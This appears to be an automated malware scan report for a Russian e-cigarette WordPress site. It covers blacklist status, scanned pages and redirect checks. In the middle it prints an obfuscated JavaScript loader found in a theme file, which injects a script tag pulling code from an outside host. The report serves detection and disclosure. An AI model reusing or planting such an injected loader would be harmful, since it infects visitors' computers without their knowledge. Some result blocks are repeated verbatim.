Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ego-c.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ego-c.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ego-c.ru/ | 200 OK Content-Length: 7463 Content-Type: text/html | clean |
http://ego-c.ru/wp-content/themes/joyetech/js/script.js | 200 OK Content-Length: 192 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- js-tools --> q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://ego-c.ru/wp-content/themes/joyetech/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://ego-c.ru/wp-content/themes/joyetech/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 11562 Content-Type: application/x-javascript | clean |
http://ego-c.ru/about-us | 200 OK Content-Length: 14153 Content-Type: text/html | clean |
http://ego-c.ru/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://ego-c.ru/where-to-buy | 200 OK Content-Length: 9045 Content-Type: text/html | clean |
http://ego-c.ru/joyetech-ego-c | 200 OK Content-Length: 16834 Content-Type: text/html | clean |
http://ego-c.ru/news | 200 OK Content-Length: 17510 Content-Type: text/html | clean |
http://ego-c.ru/contacts | 200 OK Content-Length: 5808 Content-Type: text/html | clean |
http://ego-c.ru/history | 200 OK Content-Length: 11443 Content-Type: text/html | clean |
http://ego-c.ru/certificates | 200 OK Content-Length: 8159 Content-Type: text/html | clean |
http://ego-c.ru/articles | 200 OK Content-Length: 37297 Content-Type: text/html | clean |
http://ego-c.ru/faq | 200 OK Content-Length: 39675 Content-Type: text/html | clean |
http://ego-c.ru/articles/%d1%8d%d0%bb%d0%b5%d0%ba%d1%82%d1%80%d0%be%d0%bd%d0%bd%d1%8b%d0%b5-%d1%81%d0%b8%d0%b3%d0%b0%d1%80%d0%b5%d1%82%d1%8b-%d0%be%d0%bf%d0%b0%d1%81%d0%bd%d1%8b-%d1%82%d0%b0%d0%ba-%d0%b6%d0%b5-%d0%ba%d0%b0 | 200 OK Content-Length: 11118 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ego-c.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Jul 2014 03:58:10 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://ego-c.ru/xmlrpc.php
X-Powered-By: PHP/5.4.6-1ubuntu1.7
GET / HTTP/1.1
Host: ego-c.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Jul 2014 03:58:10 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://ego-c.ru/xmlrpc.php
X-Powered-By: PHP/5.4.6-1ubuntu1.7
Second query (visit from search engine):
GET / HTTP/1.1
Host: ego-c.ru
Referer: http://www.google.com/search?q=ego-c.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ego-c.ru
Referer: http://www.google.com/search?q=ego-c.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.